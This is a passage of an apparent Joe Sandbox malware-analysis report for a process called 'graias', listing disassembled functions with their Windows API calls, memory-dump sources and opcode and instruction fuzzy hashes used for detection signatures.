                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 402128B1C003499FDB10CFAAC985ADEFBF5FF48320F10842AE518A7240D7799541DBA1
                                                                                                                                                                                                                                            Function 06E05BA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E05C1E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                                                                                            • Opcode ID: 1bbd32e1d9b99349ac6df9835e5a97c2c8f29ddefe4a6d5595e2c5b888d8ecea
                                                                                                                                                                                                                                            • Instruction ID: 22809ccd02e330a393445abecd3b9d3497fb7d11e6af4494c28294f1bcf08d32
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bbd32e1d9b99349ac6df9835e5a97c2c8f29ddefe4a6d5595e2c5b888d8ecea
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60214CB1D003098FDB10DFAAC5857EEBBF4EF48324F14842AD419A7240DB789545CFA1
                                                                                                                                                                                                                                            Function 06E05C70 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E05CE6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                            • Opcode ID: 8f14a2490a1faaeb145ea020fe32bbb88e9933ad6a0182b9a1cdd00ccf9d4143
                                                                                                                                                                                                                                            • Instruction ID: 4086df8f850b39447b3ddb388d28ebf6578942580bb268e779ede9247053b393
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f14a2490a1faaeb145ea020fe32bbb88e9933ad6a0182b9a1cdd00ccf9d4143
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07216AB19003499BDB20CFAAC845BDEBFF5EF48320F248419E959A7250CB75A540CFA0
                                                                                                                                                                                                                                            Function 06D21F64 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06D23312,?,?,?,?,?), ref: 06D233B7
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732113047.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d20000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                                                                                                                            • Opcode ID: 1a51baf5d1cecf592a1f243edf10e1c8c94b05453b4cc0e24f3db6fa7050c224
                                                                                                                                                                                                                                            • Instruction ID: 83e34300f9141324ab795c7f65e3940c27cfd854ddfc1402b68fa10a2588a0df
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a51baf5d1cecf592a1f243edf10e1c8c94b05453b4cc0e24f3db6fa7050c224
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD1137B580035ADFDB10CF9AC844BDEBFF8EB58324F14841AE514A7210C779A954DFA4
                                                                                                                                                                                                                                            Function 06E05C78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E05CE6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                            • Opcode ID: 5e4804009a815151a03dc82faf2796481d2bf4bf453a84a799ca2b00776269cf
                                                                                                                                                                                                                                            • Instruction ID: 2530b7c951f9d9be57b8b6bde4034f008b2f8e51e74e5074e13d1f63c19c9580
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e4804009a815151a03dc82faf2796481d2bf4bf453a84a799ca2b00776269cf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78116AB19003099FDB10DFAAC845BDEBFF5EF48320F248419E519A7250CB759540CFA0
                                                                                                                                                                                                                                            Function 06E056B0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                                                                                            • Opcode ID: 27bf93a739bf9257a8cfcc39d0564219a25a1e26518b50beb4220ba702435980
                                                                                                                                                                                                                                            • Instruction ID: 822bc06be209f37206f98ab962d98f3204cf8637bcddf1065995fdb3da3edc6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27bf93a739bf9257a8cfcc39d0564219a25a1e26518b50beb4220ba702435980
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 061119B5D003498ADB20DFAAC845BDEFFF9EB98324F248419D519A7240CA756940CFA5
                                                                                                                                                                                                                                            Function 06E09848 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E098AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                                                            • Opcode ID: b6f3c9034d261e481f7f90296e6263edfb34d80772902a29f144564fdff163a1
                                                                                                                                                                                                                                            • Instruction ID: e27b1480c7fa7f01577a7a8b14d96063d0f71bbba0515cf901da34c17d497d9b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6f3c9034d261e481f7f90296e6263edfb34d80772902a29f144564fdff163a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE1113B5800309DEDB20CF99D845BDEBBF8FB48324F20941AE958A7741D375A584CFA1
                                                                                                                                                                                                                                            Function 06E056B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                                                                                            • Opcode ID: 76ee27e85230686b930cd5fd322f62e6d0d4f024008a0566315dee8ebe4466d8
                                                                                                                                                                                                                                            • Instruction ID: fc48865a418b7747fd615a0dce143134962ebce9e0e4e0aa174f7cc41aefb438
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76ee27e85230686b930cd5fd322f62e6d0d4f024008a0566315dee8ebe4466d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 941128B1D003498BDB20DFAAC44579EFBF9EB88324F248419D519A7240CB796940CF95
                                                                                                                                                                                                                                            Function 06E02898 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E098AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MessagePost
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 410705778-0
                                                                                                                                                                                                                                            • Opcode ID: 17909c5e155a84c5049fa2f962c1e683d1180be1bf287078b024271e9ed1cfed
                                                                                                                                                                                                                                            • Instruction ID: f5c2c1512c61532b37eb1d88af60d4772a98d175384911de0baa1590f722b4c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17909c5e155a84c5049fa2f962c1e683d1180be1bf287078b024271e9ed1cfed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F81106B5800349DFDB10DF99C845BDEBBF8EB48320F24941AE518A7341D375A944CFA5
                                                                                                                                                                                                                                            Function 00EBBFE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00EBC046
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                            • Opcode ID: ef6daa60f771b4c69b83891cc7892b4b381c091b2fd7fa6430fff6a49ed6d8bf
                                                                                                                                                                                                                                            • Instruction ID: 5e06a6ce4511027e6fb96d9676c06de397ed13a1cc9013c979187da72a526cea
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef6daa60f771b4c69b83891cc7892b4b381c091b2fd7fa6430fff6a49ed6d8bf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5211DFB6C04249CFCB20DF9AD444ADEFBF5EB88324F24851AD419B7610D379A945CFA1
                                                                                                                                                                                                                                            Function 06D0C4E8 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Hhq
                                                                                                                                                                                                                                            • API String ID: 0-4210879014
                                                                                                                                                                                                                                            • Opcode ID: 359d46864475b4f5d290e352daa1120634656b6ab087efa2e875ce3677499b54
                                                                                                                                                                                                                                            • Instruction ID: 40a91a9bf39db8fab0305f286b087f90517cd6afe57e4d4a892e73343af6ad29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 359d46864475b4f5d290e352daa1120634656b6ab087efa2e875ce3677499b54
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9751E37AB045118FE7589B2DD884B79B7E2FF85220B14866AE119CB3E0DB30EC42C790
                                                                                                                                                                                                                                            Function 06D0B460 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3f0a09e1d56f7966c93d286ee93f30d5b9936938b4abfa2bbb55a1cf63dcb6f4
                                                                                                                                                                                                                                            • Instruction ID: c6c16e4c03d3be70253bdc1c923e2b1649e4e2e7cb1e7ab72cf31960b20b47a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f0a09e1d56f7966c93d286ee93f30d5b9936938b4abfa2bbb55a1cf63dcb6f4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5D16330A007058FE768DF38C894B6A77B6FF89321F54496AE1629B3E1DB36D845CB50
                                                                                                                                                                                                                                            Function 06D033E1 Relevance: .3, Instructions: 289COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 055af0c8346e496f9f7c217f4b95c5998b77cfcf40d33cfd579e42a96a31ac8f
                                                                                                                                                                                                                                            • Instruction ID: e6a2f21fecfbb2dfbe8bb130b3e1d5aebfe62611da066dd8098dee48c381c0f4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 055af0c8346e496f9f7c217f4b95c5998b77cfcf40d33cfd579e42a96a31ac8f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 12D1C634A00609CFEB54CF58C588FA9B7F2FF84315F6685A9E4459B2A1CB31ED86CB50
                                                                                                                                                                                                                                            Function 06D06644 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9352e9413aaab5b261c17ce2d90d11b666258c2e1e6c8b55ede9b32a9d70a9c1
                                                                                                                                                                                                                                            • Instruction ID: 52d1979de36af4507036888b8b985e6bf31ddf94ebeeb8a81b44f8539dd37f6c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9352e9413aaab5b261c17ce2d90d11b666258c2e1e6c8b55ede9b32a9d70a9c1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BA1C734A00204DFEB54DF68D888FA977B1FF49315F5591A8E4459F2A2CB30E885CB50
                                                                                                                                                                                                                                            Function 06D0FD68 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a5bbfeffa9e7c29033bd323234c87f92048af0d9c3c1b9ef66874e874e05dc53
                                                                                                                                                                                                                                            • Instruction ID: ef356fadaf359aeb6acbd677c45dd25a512179b8ef3438a5b4013512d4e8ec1f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5bbfeffa9e7c29033bd323234c87f92048af0d9c3c1b9ef66874e874e05dc53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36618670E04209CFEB64DFA9C4447AEBBF6AF89300F249469D859E7391D734D941CBA0
                                                                                                                                                                                                                                            Function 06D0C2B0 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b5bb1452d64134f46971cf3b0848e9d6555c458df7f84388186a805be71a0a83
                                                                                                                                                                                                                                            • Instruction ID: b7a52597b58bc2bee27007acc79361ddd1b8b1af4c8a9d25f979b075810b4c63
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5bb1452d64134f46971cf3b0848e9d6555c458df7f84388186a805be71a0a83
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B518F30B103059FEBA49B64C844BEA77E6FF88305F108529D15ADB2E1DFB5E885CB50
                                                                                                                                                                                                                                            Function 06D09E4C Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5db575a3c12eacbe81ce188023bd944773ab725e58217ddeb52e632a79eef500
                                                                                                                                                                                                                                            • Instruction ID: 1202dd8587e1c357c579df7d2888712c1bcd11f3c71b4f67937df8f64b576306
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5db575a3c12eacbe81ce188023bd944773ab725e58217ddeb52e632a79eef500
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF519F757006048FD754DB68D894B6A77E2EF88320F148A7AE50ACB3A4DF71EC45CB94
                                                                                                                                                                                                                                            Function 06D0CC68 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a783c85b77dadd2db4fb749fcffefb99cd55c7494dc0d0d9433f5d6da20a3669
                                                                                                                                                                                                                                            • Instruction ID: cb9d8f52cbb71b98e00ade876e30ac21d1a82a5de0cc5af9dcc1f9705330e9e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a783c85b77dadd2db4fb749fcffefb99cd55c7494dc0d0d9433f5d6da20a3669
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C4191357606018FEBA4DF29C884B6D77E6BFC5310F158669E44ACB2E1DE30E881DB60
                                                                                                                                                                                                                                            Function 06D02670 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c7081f83bfbf0a5a3d4b650c131d64ea586d82752bbba7756682f90fbd312596
                                                                                                                                                                                                                                            • Instruction ID: 366879759020e1623306b85367e57effd30d77fed2a55b75f899f917d44cc3ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7081f83bfbf0a5a3d4b650c131d64ea586d82752bbba7756682f90fbd312596
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31412730E023109FE7659728D8487AAB7E6EFC5310F5484AEE40AC7A85CB75DD45CB91
                                                                                                                                                                                                                                            Function 06D07BD0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 25f70a4141c65df641305fa19a9eb42aedef02ea8b569c4cccefa7612f90905d
                                                                                                                                                                                                                                            • Instruction ID: 406a8f0a5313738884b6472b87872600b61f7bea66bcf11024a4f1daa623559a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25f70a4141c65df641305fa19a9eb42aedef02ea8b569c4cccefa7612f90905d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D415E70700601CFEBA8AB24C884B6AB3A6FF85310F508569D1168B2E0DB71EC46CBA5
                                                                                                                                                                                                                                            Function 06D07BC0 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 78779f5b2e106da2cf6725a15bd337317a4af82318d05447d8fa4066df66a509
                                                                                                                                                                                                                                            • Instruction ID: da366a563608c853dd0adb275cf0c226b6ad9ec06bbea16756c448b9504d1ab0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78779f5b2e106da2cf6725a15bd337317a4af82318d05447d8fa4066df66a509
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3416170700601CFEBA9AB24C884B6EB3A2FF85310F548569D5168B2D1CB71EC46CBA5
                                                                                                                                                                                                                                            Function 06D0FE18 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7bd0cbe4519b532259bdd09c1a69bb0467d43c3e6e45ea1cf48d7d3c2b9c05f9
                                                                                                                                                                                                                                            • Instruction ID: 911448a31b5bff4d3a19e1fd5f515e8c879331401b6979524d133330437978b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bd0cbe4519b532259bdd09c1a69bb0467d43c3e6e45ea1cf48d7d3c2b9c05f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75412874D09208CFEB54CFAAD4446EEBBF6AF8D300F24D06AD859A3291D7748945CF94
                                                                                                                                                                                                                                            Function 06D0CC58 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d367d5b0548665f979aff923d6883431805197ae99d4dec811cd3d7e93ec4c9e
                                                                                                                                                                                                                                            • Instruction ID: 18d5f7185ffc1959aac3ee5d0cd53246bf5539bb468c2855a2a23a8d262ac326
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d367d5b0548665f979aff923d6883431805197ae99d4dec811cd3d7e93ec4c9e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4241A235B602118FEBA4DB39C884BAE7BA2AFC5310F154669E456CB2E1DE30DC41DB61
                                                                                                                                                                                                                                            Function 06D067A0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 44293d46ebf1534c3da7fd569528766cb0aac4719277ff96e84ad539609fe75f
                                                                                                                                                                                                                                            • Instruction ID: 9a1cc5db3175586e3c7d13fc0499a62233ac8539a8082fc24fe935135a734e37
